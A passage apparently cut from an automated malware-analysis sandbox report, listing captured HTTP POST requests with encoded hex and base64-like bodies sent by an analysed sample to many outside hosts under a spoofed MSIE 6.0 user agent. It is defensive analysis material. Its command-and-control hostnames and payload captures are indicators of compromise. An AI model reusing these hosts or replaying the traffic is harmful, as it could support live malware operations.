7a 4b 65 79 49 63 76 46 57 70 43 55 71 42 53 6c 35 50 6a 7a 48 63 79 49 61 75 45 59 74 43 55 6d 35 52 6b 35 4f 5a 77 4c 68 36 4b 61 74 44 57 71 36 50 6a 34 4e 65 79 4a 64 76 47 58 79 4e 6c 30 48 63 74 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 39 4b 59 71 7a 42 56 6d 35 4f 69 33 4e 67 31 4b 64 75 46 4d 77 36 46 51 62 6d 32 49 55 75 38 51 6c 34 53 71 37 50 68 32 4d 67 Data Ascii: 5uKguDVo7Rk3Mh2KauEXsCPdwLd0RoDXt9Tm7Pi4Lh2Lh0Kcr7SqEaq8Qk5Oj4Ph2LgxId3IZtDXs8Vt5Ng2Ie2IbvGYsEXrAUq8ToATj6Oh3Og0KfzKevFYuGbtDYsCUqASm4JYyMj8NevDYr9So6Qj3Mg0LdsCXq8Kd1Ok1GUjyFXrCWr7Qj5Nh3NizCZq4IVpATo8JSbku3CLUdmx7GPYhr3C4LTeoy7GPYhr09ISbku3CLUdmwBTo7SoATo7Ro7Jct8Pg4Nh2KdvEZuDWrCYtCSl6Pi3MgzKdwGXs9Rk7Rj4OfvFYtBUp7Si4Oi5PhzKeyIcvFWpCUqBSl5PjzHcyIauEYtCUm5Rk5OZwLh6KatDWq6Pj4NeyJdvGXyNl0Hct3CLUdmw5ENXgqz9KYqzBVm5Oi3Ng1KduFMw6FQbm2IUu8Ql4Sq7Ph2Mg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 260User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: wvs-net.deConnection: Keep-AliveCache-Control: no-cacheData Raw: 59 46 54 68 76 39 4e 61 70 33 47 55 69 77 41 4f 62 75 38 50 6a 32 50 69 7a 47 57 6d 37 53 71 35 4d 66 32 4c 66 31 4b 65 30 47 63 30 4e 6a 35 53 71 45 61 32 4d 63 30 4f 69 79 45 58 74 42 56 6c 36 53 70 39 53 6c 34 50 6b 31 4e 6f 38 53 6d 37 4f 6a 33 4d 64 74 37 54 71 43 63 74 41 54 71 41 56 70 37 55 71 39 52 6a 33 50 68 33 52 6b 34 4c 64 79 49 62 7a 4a 66 32 48 57 73 42 55 6d 39 51 6c 39 55 6b 37 4f 63 76 47 61 72 34 4a 61 7a 4d 64 76 43 57 71 46 65 30 4e 64 7a 49 62 77 46 58 74 43 55 71 41 53 6c 35 51 6b 34 4d 64 7a 4d 65 7a 47 62 75 44 56 6f 37 52 6d 36 50 6a 30 4d 68 7a 48 62 78 51 6f 42 56 6d 38 53 6a 33 4d 65 77 46 59 78 44 59 6d 36 4f 6c 37 54 6c 37 50 68 32 4e 66 30 47 61 75 46 58 6f 39 57 72 41 53 6d 37 56 6f 37 4d 62 79 4c 6a 32 50 6b 37 50 6c 33 48 63 33 4b 59 Data Ascii: YFThv9Nap3GUiwAObu8Pj2PizGWm7Sq5Mf2Lf1Ke0Gc0Nj5SqEa2Mc0OiyEXtBVl6Sp9Sl4Pk1No8Sm7Oj3Mdt7TqCctATqAVp7Uq9Rj3Ph3Rk4LdyIbzJf2HWsBUm9Ql9Uk7OcvGar4JazMdvCWqFe0NdzIbwFXtCUqASl5Qk4MdzMezGbuDVo7Rm6Pj0MhzHbxQoBVm8Sj3MewFYxDYm6Ol7Tl7Ph2Nf0GauFXo9WrASm7Vo7MbyLj2Pk7Pl3Hc3KY
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: orlyhotel.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 591User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: wantapc.netConnection: Keep-AliveCache-Control: no-cacheData Raw: 62 4b 55 64 6d 78 36 46 4f 59 68 72 31 41 4a 54 63 6c 77 35 45 50 61 6a 74 32 44 4e 57 66 71 7a 38 49 52 61 6b 75 34 44 4e 57 66 71 7a 38 48 52 61 6f 78 36 47 50 59 68 73 32 42 4b 54 64 6d 77 36 49 52 62 6b 75 33 44 4d 56 69 74 32 42 4c 55 64 6f 78 37 48 51 5a 6a 74 32 42 4c 55 64 6f 78 36 47 50 5a 6a 74 32 42 4d 56 66 70 79 37 48 51 5a 6a 74 32 43 4c 55 64 6f 78 36 46 50 59 68 73 31 42 4c 55 64 6f 78 36 47 50 59 69 73 31 42 4b 54 63 6d 77 35 46 4f 59 68 72 31 42 4b 54 64 6d 77 35 46 4f 58 68 72 31 41 4a 59 68 72 30 41 4a 53 63 6d 77 35 46 4f 59 68 73 31 42 4b 54 64 6d 78 4b 54 63 6d 77 35 46 4f 58 68 72 30 41 4a 54 63 6d 78 36 46 50 59 68 72 31 41 4a 54 64 6d 78 36 46 4f 59 68 72 31 41 4a 54 63 6c 77 35 45 4f 58 67 71 30 41 4a 53 63 6c 77 35 45 4f 58 67 71 30 48 51 5a 69 74 32 42 4c 58 67 71 30 39 4a 53 62 6c 76 34 45 4e 58 67 71 7a 39 49 52 62 6b 75 34 44 4d 56 66 70 79 38 48 53 63 6c 77 36 4d 57 66 70 7a 38 48 52 61 6a 76 34 44 4d 57 66 70 7a 38 4e 57 67 71 7a 39 49 52 62 6b 73 32 43 4c 57 66 70 7a 39 4a 53 62 6b 77 36 47 50 59 68 72 31 41 4a 53 63 6c 77 36 46 4f 58 68 72 30 39 4c 58 67 71 7a 39 4c 55 65 6f 78 36 46 50 61 6b 75 33 44 50 5a 69 73 31 42 4b 57 66 70 79 38 48 51 5a 6a 74 32 42 4b 55 64 6d 77 36 46 4f 58 67 72 30 39 49 52 62 6b 75 33 46 50 59 68 73 31 41 4b 54 64 6d 77 35 46 4f 58 67 71 30 39 49 55 65 6f 78 37 4f 58 67 71 30 39 4a 53 62 6b 76 34 44 4d 57 66 70 79 38 48 51 61 6a 74 32 42 4c 55 64 6f 78 36 46 50 59 68 72 30 41 4a 53 63 6c 76 34 46 50 59 68 72 30 41 4a 53 62 6c 76 34 44 4e 57 66 74 33 46 4f 58 67 72 30 43 4c 55 64 6f 78 41 4b 54 63 6c 77 35 47 50 5a 69 74 32 42 4b 55 64 6d 77 37 47 51 5a 6b 76 34 45 4f 58 67 71 30 39 49 53 66 70 30 41 4a 54 63 6c 77 35 45 4e 58 67 71 30 39 4d 56 66 70 79 37 48 52 61 6a 75 33 43 4c Data Ascii: bKUdmx6FOYhr1AJTclw5EPajt2DNWfqz8IRaku4DNWfqz8HRaox6GPYhs2BKTdmw6IRbku3DMVit2BLUdox7HQZjt2BLUdox6GPZjt2BMVfpy7HQZjt2CLUdox6FPYhs1BLUdox6GPYis1BKTcmw5FOYhr1BKTdmw5FOXhr1AJYhr0AJScmw5FOYhs1BKTdmxKTcmw5FOXhr0AJTcmx6FPYhr1AJTdmx6FOYhr1AJTclw5EOXgq0AJSclw5EOXgq0HQZit2BLXgq09JSblv4ENXgqz9IRbku4DMVfpy8HSclw6MWfpz8HRajv4DMWfpz8NWgqz9IRbks2CLWfpz9JSbkw6GPYhr1AJSclw6FOXhr09LXgqz9LUeox6FPaku3DPZis1BKWfpy8HQZjt2BKUdmw6FOXgr09IRbku3FPYhs1AKTdmw5FOXgq09IUeox7OXgq09JSbkv4DMWfpy8HQajt2BLUdox6FPYhr0AJSclv4FPYhr0AJSblv4DNWft3FOXgr0CLUdoxAKTclw5GPZit2BKUdmw7GQZkv4EOXgq09ISfp0AJTclw5ENXgq09MVfpy7HRaju3CL
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1100User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ssm.chConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1964User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: workplus.huConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 780User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ssm.chConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1203User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: komie.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1687User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ifesnet.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sigtoa.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4d 35 2f 37 34 77 7a 34 4c 53 58 51 76 30 76 61 64 31 50 46 71 52 38 37 62 61 37 6b 70 61 6f 77 41 41 4b 42 33 73 7a 66 4c 61 59 59 2b 73 49 63 77 6c 59 59 76 52 63 4a 4c 32 78 4e 45 30 6f 54 39 61 32 43 52 59 4a 42 50 43 4b 31 7a 57 45 2b 45 4f 48 75 4a 61 4d 57 4c 2f 36 7a 71 67 33 35 53 64 47 74 6b 62 42 67 78 36 45 36 6e 63 45 6b 36 52 73 33 73 49 6b 48 6e 4a 41 4b 4e 53 56 42 56 51 4b 49 75 6b 48 6a 59 55 53 75 72 70 38 6d 31 35 34 45 42 59 73 61 75 79 45 72 4f 37 47 6a 6f 63 6c 49 65 62 32 46 68 6b 41 4c 72 33 48 34 75 47 4e 79 34 76 39 52 34 64 45 4f 72 54 39 72 44 46 30 6a 72 57 72 51 49 2b 61 77 34 4b 2f 79 65 4d 49 5a 6c 47 56 77 2b 56 68 30 4b 7a 43 69 34 37 6e 6b 6c 75 79 45 53 6c 63 62 57 79 67 4e 4d 2f 46 67 43 71 35 55 77 47 33 78 79 46 51 68 30 41 48 6c 31 38 71 36 39 57 34 38 61 7a 49 6e 39 79 61 75 34 5a 68 69 45 67 37 65 66 31 49 52 33 74 75 5a 59 6c 45 35 74 6c 57 4a 39 75 62 32 31 62 6e 69 4a 31 47 65 63 41 2b 62 49 36 6b 35 63 6b 47 52 6e 5a 4b 68 2f 6b 76 6d 2b 73 6b 63 71 2b 37 6f 4c 4c 69 4c 4a 79 78 4f 6b 45 67 43 6b 47 31 76 67 4a 46 58 55 36 72 56 65 35 46 38 4d 2f 36 31 59 4f 78 37 7a 44 56 34 69 43 58 43 69 78 56 76 4c 35 39 4f 79 64 64 33 38 30 73 62 71 4d 38 76 36 72 6a 2f 58 58 70 38 39 4b 43 71 58 73 58 47 64 39 47 6e 62 6c 51 2f 6f 61 66 31 43 6d 50 45 34 53 70 47 57 61 46 56 30 52 51 4f 75 46 6a 4e 4b 48 64 36 49 71 7a 4e 6f 65 50 63 30 57 35 6b 57 38 61 50 4f 5a 57 68 52 34 6a 2b 38 57 33 72 42 4d 34 5a 75 59 43 6a 64 7a 30 32 56 4a 30 73 38 4b 74 68 65 66 55 4b 36 2b 68 51 30 4c 79 52 49 55 38 5a 59 77 6f 52 69 6f 35 46 69 6f 64 78 73 6a 54 6c 6f 43 34 38 79 4c 47 4a 52 68 33 42 6d 30 64 46 76 68 59 31 77 79 79 48 4d 75 61 77 49 36 6b 78 4c 46 2b 2b 68 5a 76 64 6b 43 59 3d Data Ascii: M5/74wz4LSXQv0vad1PFqR87ba7kpaowAAKB3szfLaYY+sIcwlYYvRcJL2xNE0oT9a2CRYJBPCK1zWE+EOHuJaMWL/6zqg35SdGtkbBgx6E6ncEk6Rs3sIkHnJAKNSVBVQKIukHjYUSurp8m154EBYsauyErO7GjoclIeb2FhkALr3H4uGNy4v9R4dEOrT9rDF0jrWrQI+aw4K/yeMIZlGVw+Vh0KzCi47nkluyESlcbWygNM/FgCq5UwG3xyFQh0AHl18q69W48azIn9yau4ZhiEg7ef1IR3tuZYlE5tlWJ9ub21bniJ1GecA+bI6k5ckGRnZKh/kvm+skcq+7oLLiLJyxOkEgCkG1vgJFXU6rVe5F8M/61YOx7zDV4iCXCixVvL59Oydd380sbqM8v6rj/XXp89KCqXsXGd9GnblQ/oaf1CmPE4SpGWaFV0RQOuFjNKHd6IqzNoePc0W5kW8aPOZWhR4j+8W3rBM4ZuYCjdz02VJ0s8KthefUK6+hQ0LyRIU8ZYwoRio5FiodxsjTloC48yLGJRh3Bm0dFvhY1wyyHMuawI6kxLF++hZvdkCY=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=71b4be5aea89a6abfd51244d02d1d985|102.129.145.68|1696859437|1696859437|0|1|0; snkz=102.129.145.68Data Raw: 4b 47 71 2b 59 62 6d 65 57 79 55 54 49 68 48 51 53 4c 68 6b 49 31 4a 76 54 6a 57 58 2b 68 54 65 2f 59 79 49 42 72 30 2f 4c 2b 58 6f 68 2f 52 73 54 41 70 6c 51 2b 70 36 44 39 48 70 68 31 63 4e 65 36 4a 53 6c 79 53 50 34 67 6b 44 72 34 4f 41 65 6a 61 78 63 71 48 67 55 31 2b 6d 68 67 43 52 57 30 64 4e 32 79 2f 47 6d 59 59 70 78 32 58 38 51 54 54 57 61 46 59 4b 79 79 51 55 51 6a 4c 4d 4a 69 6e 63 76 71 73 6a 79 7a 4e 70 59 45 72 46 35 58 68 58 70 30 37 2b 30 30 73 43 66 6a 5a 56 34 59 69 33 50 31 74 6f 6e 43 4e 6f 5a 41 75 6c 35 4b 79 2b 6d 4d 72 37 4c 2b 64 7a 71 63 41 4c 46 58 67 56 56 7a 6b 70 73 5a 31 50 48 76 36 32 34 74 41 69 2f 58 6e 4d 44 53 4a 69 72 42 64 6a 52 39 66 6c 69 63 61 6f 4a 47 64 56 43 65 50 6d 43 46 37 39 31 44 65 66 73 79 74 76 6f 36 6b 58 46 6e 78 4d 67 52 52 46 75 79 4c 64 41 74 74 7a 6b 34 4b 71 55 33 43 68 2f 6e 6e 48 52 58 43 63 59 57 35 6f 6c 39 61 48 79 74 4a 56 4c 71 68 79 72 62 31 51 68 62 6d 74 62 53 54 36 46 64 6f 4e 38 31 6e 6d 63 2f 5a 2f 33 71 65 53 6f 58 57 6c 70 59 79 44 6c 62 71 78 56 52 56 30 6d 6a 74 32 67 46 52 59 56 6e 4e 59 2b 56 62 56 66 69 5a 65 56 47 70 71 66 4f 67 61 6e 6b 48 4e 4e 58 43 5a 65 73 44 49 41 33 67 4f 31 7a 76 77 5a 64 2f 52 43 65 32 38 6c 35 79 56 6b 6c 79 31 77 6f 2f 4e 2f 6c 61 6f 46 42 4f 53 4b 69 51 30 30 52 48 6e 6b 30 38 4f 50 56 36 65 59 66 59 51 42 5a 4a 6a 39 41 4d 47 36 77 47 4d 70 47 6c 62 38 71 54 55 41 4c 52 43 49 44 64 50 71 55 47 46 49 51 4c 70 38 6a 35 63 52 44 74 32 51 7a 63 76 2b 44 34 67 6f 49 6f 44 33 34 59 47 43 6b 47 4a 73 71 58 53 5a 64 58 56 64 5a 6d 36 39 56 6f 39 58 32 66 4a 34 45 58 41 58 34 33 42 52 74 30 51 50 6f 7a 49 34 39 39 66 77 61 39 66 41 37 61 4b 43 46 50 6a 66 7a 6c 37 61 57 59 30 52 70 50 66 51 6e 55 42 36 41 3d 3d Data Ascii: KGq+YbmeWyUTIhHQSLhkI1JvTjWX+hTe/YyIBr0/L+Xoh/RsTAplQ+p6D9Hph1cNe6JSlySP4gkDr4OAejaxcqHgU1+mhgCRW0dN2y/GmYYpx2X8QTTWaFYKyyQUQjLMJincvqsjyzNpYErF5XhXp07+00sCfjZV4Yi3P1tonCNoZAul5Ky+mMr7L+dzqcALFXgVVzkpsZ1PHv624tAi/XnMDSJirBdjR9flicaoJGdVCePmCF791Defsytvo6kXFnxMgRRFuyLdAttzk4KqU3Ch/nnHRXCcYW5ol9aHytJVLqhyrb1QhbmtbST6FdoN81nmc/Z/3qeSoXWlpYyDlbqxVRV0mjt2gFRYVnNY+VbVfiZeVGpqfOgankHNNXCZesDIA3gO1zvwZd/RCe28l5yVkly1wo/N/laoFBOSKiQ00RHnk08OPV6eYfYQBZJj9AMG6wGMpGlb8qTUALRCIDdPqUGFIQLp8j5cRDt2Qzcv+D4goIoD34YGCkGJsqXSZdXVdZm69Vo9X2fJ4EXAX43BRt0QPozI499fwa9fA7aKCFPjfzl7aWY0RpPfQnUB6A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 274User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ccssinc.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 47 77 47 61 76 47 54 68 79 47 57 70 36 4e 67 7a 46 56 6f 34 4d 64 77 44 54 69 7a 48 62 75 44 56 6b 32 49 5a 73 39 51 69 78 46 57 70 37 4f 64 75 43 55 6c 30 47 58 71 37 4d 64 76 43 55 6c 7a 47 59 73 39 50 67 30 46 55 67 78 47 61 70 32 4c 62 73 38 51 68 30 46 56 6c 34 4d 61 72 39 52 66 71 39 53 68 30 4c 66 74 35 46 56 6d 33 4c 65 76 44 55 6f 33 4b 56 68 77 45 51 67 74 43 4c 65 73 39 53 6a 31 47 54 6f 7a 39 52 62 74 35 4f 61 70 34 4b 61 74 37 52 68 31 49 5a 70 37 4e 66 77 43 56 6d 35 4e 62 75 42 54 6b 32 4b 62 70 37 50 67 78 45 55 6b 34 4c 61 6d 37 53 6c 31 4a 62 73 38 51 62 72 38 50 6a 33 49 62 74 42 53 69 78 37 4f 62 70 31 47 58 6d 34 4d 62 74 42 55 6d 34 4a 65 78 45 56 6d 36 4e 64 76 44 55 6c 34 4b 63 74 41 53 6a 32 4a 58 71 38 4f 65 78 45 57 6c 33 4a 62 73 32 4b 62 79 39 4e 65 78 46 55 6d 36 50 67 7a 44 51 67 Data Ascii: GwGavGThyGWp6NgzFVo4MdwDTizHbuDVk2IZs9QixFWp7OduCUl0GXq7MdvCUlzGYs9Pg0FUgxGap2Lbs8Qh0FVl4Mar9Rfq9Sh0Lft5FVm3LevDUo3KVhwEQgtCLes9Sj1GToz9Rbt5Oap4Kat7Rh1IZp7NfwCVm5NbuBTk2Kbp7PgxEUk4Lam7Sl1Jbs8Qbr8Pj3IbtBSix7Obp1GXm4MbtBUm4JexEVm6NdvDUl4KctASj2JXq8OexEWl3Jbs2Kby9NexFUm6PgzDQg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 213User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: k-nikko.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6a 77 38 49 54 66 71 31 43 4e 58 68 73 33 44 4e 59 69 74 34 45 4f 5a 6a 76 35 46 50 61 6c 77 37 49 54 64 70 7a 41 4c 57 68 73 32 44 4e 58 68 73 33 44 4f 59 69 75 35 47 52 62 6d 79 39 4a 55 65 71 30 42 4d 58 68 73 33 45 50 61 6c 77 34 45 50 61 6d 79 39 4b 55 66 72 32 44 4f 59 6a 75 35 46 50 5a 6b 77 37 48 53 64 6f 7a 41 4b 56 66 72 31 43 4e 58 69 73 32 42 4d 58 68 74 33 43 4d 57 67 71 30 41 4b 55 65 71 30 41 4a 55 67 58 76 33 42 4a 52 59 67 71 7a 37 46 4d 55 63 6b 75 32 41 49 51 59 67 70 77 34 43 4b 54 62 6a 72 7a 37 46 4e 55 63 6f 78 35 44 4c 53 61 6a 72 30 38 47 4f 57 64 6d 77 34 43 4a 52 5a 68 71 79 36 44 4c 54 62 6a 73 30 37 46 Data Ascii: jw8ITfq1CNXhs3DNYit4EOZjv5FPalw7ITdpzALWhs2DNXhs3DOYiu5GRbmy9JUeq0BMXhs3EPalw4EPamy9KUfr2DOYju5FPZkw7HSdozAKVfr1CNXis2BMXht3CMWgq0AKUeq0AJUgXv3BJRYgqz7FMUcku2AIQYgpw4CKTbjrz7FNUcox5DLSajr08GOWdmw4CJRZhqy6DLTbjs07F
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1059User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: any-s.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 384User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: onzcda.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 67 73 31 41 49 52 61 69 73 31 39 49 56 69 74 35 45 4e 57 6c 78 39 49 52 61 6f 7a 38 4a 54 63 6b 75 33 42 4b 54 63 6b 75 33 42 4b 54 63 6b 75 33 42 4b 54 62 6b 75 32 42 4b 54 62 6b 75 33 43 4b 54 63 71 79 44 4d 56 65 6d 77 35 45 4d 56 65 6d 77 35 45 4d 56 65 6d 77 35 44 4d 57 66 70 79 37 48 51 5a 6a 75 33 43 4c 54 64 6d 78 36 46 4e 57 66 6f 79 37 47 50 59 68 71 7a 38 47 50 59 67 71 7a 38 47 50 59 68 72 7a 39 4a 53 64 6f 78 35 46 53 64 6d 76 34 46 50 62 6c 76 34 43 4c 61 6d 77 38 4b 5a 69 74 32 43 4b 54 63 6b 75 33 42 4e 59 68 71 7a 38 47 50 59 67 71 7a 37 47 50 58 67 70 79 38 48 50 59 68 71 7a 38 47 50 59 67 71 7a 38 47 50 59 67 71 7a 37 47 50 58 67 71 7a 37 47 4f 58 67 70 79 37 46 4f 58 66 70 79 36 46 4f 57 66 70 78 36 46 4f 57 66 70 78 36 46 4e 57 65 6f 78 36 46 4f 57 66 77 38 4d 5a 6b 76 33 43 4f 64 74 36 47 50 5a 69 73 37 47 4f 58 67 76 36 4d 57 6d 76 34 47 54 68 79 38 48 52 61 72 7a 38 48 56 67 75 34 44 4c 55 64 6c 76 34 43 4c 55 63 6c 76 33 43 4c 54 63 6c 75 33 43 4b 54 63 6c 76 33 43 4c 54 63 6c 75 33 43 4b 54 63 6b 75 33 42 4b 54 62 6b 75 33 42 4b 57 66 71 7a 39 49 51 62 6b 74 32 42 4b 53 62 6b 74 36 46 4e 57 66 6f 78 36 45 4e Data Ascii: gs1AIRais19IVit5ENWlx9IRaoz8JTcku3BKTcku3BKTcku3BKTbku2BKTbku3CKTcqyDMVemw5EMVemw5EMVemw5DMWfpy7HQZju3CLTdmx6FNWfoy7GPYhqz8GPYgqz8GPYhrz9JSdox5FSdmv4FPblv4CLamw8KZit2CKTcku3BNYhqz8GPYgqz7GPXgpy8HPYhqz8GPYgqz8GPYgqz7GPXgqz7GOXgpy7FOXfpy6FOWfpx6FOWfpx6FNWeox6FOWfw8MZkv3COdt6GPZis7GOXgv6MWmv4GThy8HRarz8HVgu4DLUdlv4CLUclv3CLTclu3CKTclv3CLTclu3CKTcku3BKTbku3BKWfqz9IQbkt2BKSbkt6FNWfox6EN
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1453User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: rtcasey.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1065User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: ikulani.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1127User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: acraloc.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 304User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: cbaben.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 4b 38 4f 6b 32 4d 66 76 43 53 6a 31 48 57 70 32 47 55 73 37 4a 61 74 43 55 6b 34 4a 62 74 41 4f 67 30 4b 58 66 6f 76 33 42 4a 52 5a 67 70 78 35 44 4c 54 61 69 72 7a 37 46 4d 55 64 6b 76 36 43 63 75 43 56 6c 34 4c 62 71 38 51 69 79 47 61 75 39 53 69 33 4c 62 75 6a 30 39 48 50 58 66 6f 76 33 42 4a 52 5a 68 71 79 36 46 52 61 71 37 50 68 79 47 62 74 41 57 6f 30 44 4f 64 76 45 57 6d 32 50 67 79 46 57 6c 35 4c 63 75 42 52 66 7a 46 56 6d 34 4c 64 77 44 53 6c 32 4c 65 77 42 53 6c 33 4a 61 72 35 4e 66 76 42 4f 57 65 6d 76 33 41 49 51 59 67 70 78 34 43 4b 56 67 7a 49 66 79 46 59 72 38 51 68 7a 44 53 6c 32 49 59 72 37 50 67 79 46 55 65 77 43 56 71 31 47 58 71 36 4f 65 77 42 54 6d 34 4b 63 41 4b 53 61 69 72 7a 37 45 4d 55 63 6b 75 32 41 49 51 61 69 72 7a 37 46 4d 55 63 6b 76 33 43 4b 52 61 6f 31 48 59 6f 33 48 58 70 33 49 57 4a 62 73 38 4e 65 75 39 4e 61 6b 76 36 47 51 62 6c 77 37 49 53 63 6f 79 38 49 54 64 6f Data Ascii: K8Ok2MfvCSj1HWp2GUs7JatCUk4JbtAOg0KXfov3BJRZgpx5DLTairz7FMUdkv6CcuCVl4Lbq8QiyGau9Si3Lbuj09HPXfov3BJRZhqy6FRaq7PhyGbtAWo0DOdvEWm2PgyFWl5LcuBRfzFVm4LdwDSl2LewBSl3Jar5NfvBOWemv3AIQYgpx4CKVgzIfyFYr8QhzDSl2IYr7PgyFUewCVq1GXq6OewBTm4KcAKSairz7EMUcku2AIQairz7FMUckv3CKRao1HYo3HXp3IWJbs8Neu9Nakv6GQblw7IScoy8ITdo
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 827User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: themark.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1570User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: stopllc.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1762User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: from30ty.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sinwal.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 960User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: cutchie.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4d 35 2f 37 34 77 7a 34 4c 53 58 51 76 30 76 61 64 31 50 46 71 52 38 37 62 61 37 6b 70 61 6f 77 41 41 4b 42 33 73 7a 66 4c 61 59 59 2b 73 49 63 77 6c 59 59 76 52 63 4a 4c 32 78 4e 45 30 6f 54 39 61 32 43 52 59 4a 42 50 43 4b 31 7a 57 45 2b 45 4f 48 75 4a 61 4d 57 4c 2f 36 7a 71 67 33 35 53 64 47 74 6b 62 42 67 78 36 45 36 6e 63 45 6b 36 52 73 33 73 49 6b 48 6e 4a 41 4b 4e 53 56 42 56 51 4b 49 75 6b 48 6a 59 55 53 75 72 70 38 6d 31 35 34 45 42 59 73 61 75 79 45 72 4f 37 47 6a 6f 63 6c 49 65 62 32 46 68 6b 41 4c 72 33 48 34 75 47 4e 79 34 76 39 52 34 64 45 4f 